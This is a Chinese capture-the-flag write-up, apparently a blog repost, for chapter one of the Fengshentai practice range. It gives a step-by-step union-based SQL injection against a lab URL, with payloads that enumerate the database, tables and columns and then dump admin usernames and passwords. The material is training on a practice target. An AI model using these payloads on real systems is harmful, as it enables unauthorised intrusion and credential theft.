封神台靶场 第一章:为了女神小芳!writeup

封神台靶场 第一章:为了女神小芳!

目录

封神台靶场 第一章:为了女神小芳!

题目简述:

解题过程:

寻找注入点

查看字段数

查看回显位置

查看版本信息

爆数据库名

爆表名

爆字段名

获取字段值

总结


题目简述:

封神台靶场,题目链接

封神台靶场 第一章:为了女神小芳!writeup_第1张图片

解题过程:

首先是这样的url为:

http://59.63.200.79:8003/

封神台靶场 第一章:为了女神小芳!writeup_第2张图片

当点击点击查看新闻时,相应的url变化,变为如下:

http://59.63.200.79:8003/?id=1

寻找注入点

?id=1 and 1=1#   回显正常

?id=1 and 1=2#  回显异常

查看字段数

?id=1 order by 1,2#  回显正常

?id=1 order by 3#  回显异常

判断字段数为2

查看回显位置

得到回显位置为2

?id=20 union select 1,2#

封神台靶场 第一章:为了女神小芳!writeup_第3张图片

查看版本信息

?id=20 union select 1,version()#

封神台靶场 第一章:为了女神小芳!writeup_第4张图片

爆数据库名

?id=20 union select 1,database()#

封神台靶场 第一章:为了女神小芳!writeup_第5张图片

爆表名

?id=20 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

封神台靶场 第一章:为了女神小芳!writeup_第6张图片

爆字段名

猜测所要的信息在admin表中

?id=20 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#

封神台靶场 第一章:为了女神小芳!writeup_第7张图片

获取字段值

?id=20 union select 1,group_concat(username,0x3a,password) from admin#

最后将hellohack作为flag提交即可。

总结

这个题目比较常规,算是又复习了一遍联合注入的知识,加深了印象。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

你可能感兴趣的:(CTF刷题记录,安全)